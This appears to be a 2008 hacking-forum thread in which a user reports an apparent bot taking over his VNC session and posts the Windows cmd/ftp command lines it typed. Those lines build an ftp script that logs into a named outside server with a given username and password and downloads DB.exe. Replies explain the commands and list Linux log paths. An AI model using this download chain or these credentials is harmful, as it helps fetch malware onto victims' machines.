Follow us on Twitter!
I'd prefer to die standing, than to live on my knees - Che Guevara
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 29
Guests Online: 28
Members Online: 1

Registered Members: 82885
Newest Member: ConiBE
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Author

a Bot/Human tryed connecting to my vncserver.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 23-01-08 22:04
Basically at the time I was looking up something on Google and the previous days my friend had been helping me do some stuff in Ubuntu Linux by connecting remotely and so anyhow i was Lookinn something up in Google when suddenly I got a prompt for Someone to access my PC remotely I immediately assumed it was my friend and allowed it and didn't note the IP address and I'm on Linux so the attempt failed in 2 ways heres what i saw when i allowed it this was typed into the Google search box.. What you see could be fragments because i clicked out of the search box a few times..

:evil:h4x0r:evil:n00b:evil:Attempt:evil:below:evil:lol:evil:0wned:evil:

"systemroot%\system32\cmd.exe &echo binary > > &echo get D B.exe >>&echo bye >> &ftp -n -v -s &del & DB.exe &exit"

:evil::evil::evil::evil:evil h4x0r attempt failed:evil::evil::evil::evil:

That is what I can recover, the whole time I figured it was my friend logging and and screwing around but he says he didn't do it i had him connect and look for VNC logs of previous allowed connections he couldn't find any but does anyone know what happened? and where the logs are?

Edited by on 23-01-08 22:05
Author

RE: a Bot/Human tryed connecting to my vncserver.

fuser
Member



Posts: 960
Location: in front of a computer (duh)
Joined: 05.04.07
Rank:
Mad User
Posted on 24-01-08 04:05
well here are the directory for the logs and you can usually view them with a text editor like gedit.

=> /var/log/messages : General log messages

=> /var/log/boot : System boot log

=> /var/log/debug : Debugging log messages

=> /var/log/auth.log : User login and authentication logs

=> /var/log/daemon.log : Running services such as squid, ntpd and others log message to this file

=> /var/log/dmesg : Linux kernel ring buffer log

=> /var/log/dpkg.log : All binary package log includes package installation and other information

=> /var/log/faillog : User failed login log file

=> /var/log/kern.log : Kernel log file

=> /var/log/lpr.log : Printer log file

=> /var/log/mail.* : All mail server message log files

=> /var/log/mysql.* : MySQL server log file

=> /var/log/user.log : All userlevel logs

=> /var/log/xorg.0.log : X.org log file

=> /var/log/apache2/* : Apache web server log files directory

=> /var/log/lighttpd/* : Lighttpd web server log files directory

=> /var/log/fsck/* : fsck command log

=> /var/log/apport.log : Application crash report / log file

i think this is the log for vnc:
/home/user/.vnc/xstartup


img.userbarz.com/51/10006.png
img.userbarz.com/146/29144.gif
img.userbarz.com/99/19602.jpg
img.userbarz.com/4/600.png
img.userbarz.com/45/8814.gif
img360.imageshack.us/img360/9231/bfbarlr0.jpg
[url=http://userbarz.com/][img]ht
catinthecpu@hotmail.com
Author

RE: Happened again got the IP lol


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 24-01-08 07:59
I waited for it to its 3 am which makes it a unusual time to be on the computer. but I was busy tonight so..

heres what i got so far which is mising maybe half a second of text cause i screenshotted the IP address

cmd /c echo open ftpd.xbytez.com.ar 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s

Specifics:
"B0t _A159753b"
"xbytez.com"
"open ftpd"

Its a bot.with a hostname of "wsip-70-168-158-181.oc.oc.cox.net"
IP Address: 70.168.158.181
Author

RE: a Bot/Human tryed connecting to my vncserver.

korg
Admin from hell



Posts: 2798
Location: ENDING YOUR ONLINE EXPERIENCE!
Joined: 01.01.06
Rank:
God
Posted on 24-01-08 10:36
If you understood what is say's it's trying to create a file called "ik" with instructions which will then pass to the command "ftp" to:

Ftp> open ftpd.xbytez.com.zr 21
ftp> user B0t _A159753b
ftp> binary
ftp> get DB.exe

I suggest you dump VNC. Check your ports to see what's open and scan your computer with a good A/V program.(In safe mode) Look for DB.exe

I thought this was patched in VNC what version do you have. Anyway you got jacked.
Do not leave remote access on all the time, And better yet know who is connecting.


i57.photobucket.com/albums/g215/korg1269/shodan13.jpg

I deal in pain, All life I drain, I dominate, I seal your fate.
O R
Author

RE: a Bot/Human tryed connecting to my vncserver.

hellboundhackersok
Member



Posts: 353
Location:
Joined: 20.09.07
Rank:
Moderate
Warn Level: 95
Posted on 24-01-08 16:08
Lol, that bot tried attacking a windows computer.. and you were on Linux.. so you have nothing to worry about...

linux pwns


i.imgur.com/qBWHo0R.png
Author

RE: a Bot/Human tryed connecting to my vncserver.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 24-01-08 17:23
I connected to the FTP server and logged in with the details the bot was going to use, i found a few .exe s, which i plan to run in a VM later Grin

and a text file called GET 0UT.txt
Here's the content:

GET 0ut holmes

hahaha

0wned?

just a friendly msg to av companys: FUCK U
Author

RE: a Bot/Human tryed connecting to my vncserver.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 24-01-08 17:28
http://isc.sans.org/diary.html?storyid=3630

Go there, apparently it's a bot that is easily attainable. Some kid got hacked while playing a pc game. Could help with your problem.


Author

RE: a Bot/Human tryed connecting to my vncserver.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 24-01-08 17:54
hellboundhackersok wrote:
Lol, that bot tried attacking a windows computer.. and you were on Linux.. so you have nothing to worry about...

linux pwns


Exactly! Smile so korg it wouldnt effect me considering the bot typed it all in google i tryed logging into the FTP I could'nt get in whats the user/pass
isint the username something like B0T_A157#somthing#somthing#somthing
I think its a problem with VNC ill just update VNC see what that does

Edited by on 24-01-08 17:55
Author

RE: a Bot/Human tryed connecting to my vncserver.

korg
Admin from hell



Posts: 2798
Location: ENDING YOUR ONLINE EXPERIENCE!
Joined: 01.01.06
Rank:
God
Posted on 24-01-08 18:42
Wrong read the last line of the code FTP -n -v -s. So you can't use ftp on linux eehh:

http://linux.abou. . .l1_ftp.htm

Works both ways.


i57.photobucket.com/albums/g215/korg1269/shodan13.jpg

I deal in pain, All life I drain, I dominate, I seal your fate.
O R
Author

RE: a Bot/Human tryed connecting to my vncserver.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 24-01-08 18:49
However DB.exe would not be able to run unless you used wine.
Author

RE: a Bot/Human tryed connecting to my vncserver.

korg
Admin from hell



Posts: 2798
Location: ENDING YOUR ONLINE EXPERIENCE!
Joined: 01.01.06
Rank:
God
Posted on 24-01-08 19:06
again in the ftp command it says "get" not install DB.exe which you have no idea what code is in that exe. file. Yes it does run on linux
look more into yourself to find out. On linux I believe it was just DB or IKDB or just IK. as the backdoor. Check your computer for those files.





i57.photobucket.com/albums/g215/korg1269/shodan13.jpg

I deal in pain, All life I drain, I dominate, I seal your fate.

Edited by korg on 24-01-08 19:27
O R
Author

RE: a Bot/Human tryed connecting to my vncserver.


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-01-08 04:19
oh i see

Edited by on 25-01-08 06:16